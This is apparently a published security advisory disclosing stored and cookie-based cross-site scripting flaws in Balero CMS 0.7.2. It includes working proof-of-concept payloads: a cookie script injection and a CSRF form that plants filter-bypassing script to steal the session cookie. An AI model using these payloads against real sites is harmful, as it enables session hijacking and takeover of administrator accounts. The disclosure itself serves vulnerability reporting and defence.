Balero CMS 0.7.2 Cross Site Scripting

Type packetstorm
Reporter LiquidWorm
Modified 2015-04-07T00:00:00


Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities  
Vendor: BaleroCMS Software  
Product web page:  
Affected version: 0.7.2  
Summary: Balero CMS is an open source project that can help you manage  
the page of your company with just a few guided steps, minimizing the  
costs that many companies make to have your advertising medium and/or  
Desc: Input passed to the 'content' POST parameter and the cookie 'counter'  
is not properly sanitised before being returned to the user. This can be  
exploited to execute arbitrary HTML and script code in a user's browser  
session in context of an affected site.  
Tested on: Apache 2.4.10 (Win32)  
PHP 5.6.3  
MySQL 5.6.21  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2015-5239  
Advisory URL:  
document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";  
csrf+stored xss+filter bypass+session hijack:  
<form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">  
<input type="hidden" name="title" value="ZSL" />  
<input type="hidden" name="content" value="pwned</textarea><s\cript>document.location=""+docu\ment.cookie;</s\cript>" />  
<input type="hidden" name="files" value="joxy.poxy" />  
<input type="hidden" name="delete_post[]" value="135" />  
<input type="hidden" name="id" value="135" />  
<input type="hidden" name="submit" value="" />  
<input type="submit" value="Submit form" />